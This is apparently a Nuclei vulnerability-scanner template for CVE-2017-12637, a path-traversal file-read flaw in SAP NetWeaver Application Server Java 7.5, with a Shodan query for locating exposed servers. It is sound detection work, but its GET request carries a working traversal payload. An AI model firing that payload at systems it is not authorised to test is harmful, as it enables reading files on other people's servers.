39 lines
1.3 KiB
YAML
39 lines
1.3 KiB
YAML
|
id: CVE-2017-12637
|
||
|
|
||
|
info:
|
||
|
name: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion
|
||
|
author: apt-mirror
|
||
|
severity: high
|
||
|
description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
|
||
|
reference:
|
||
|
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
|
||
|
- https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637
|
||
|
- http://www.sh0w.top/index.php/archives/7/
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
|
cvss-score: 7.5
|
||
|
cve-id: CVE-2017-12637
|
||
|
cwe-id: CWE-22
|
||
|
metadata:
|
||
|
shodan-query: http.favicon.hash:-266008933
|
||
|
tags: cve,cve2017,sap,lfi,java,traversal
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: word
|
||
|
words:
|
||
|
- "WEB-INF"
|
||
|
- "META-INF"
|
||
|
condition: and
|
||
|
part: body
|
||
|
|
||
|
# Enhanced by mp on 2022/06/09
|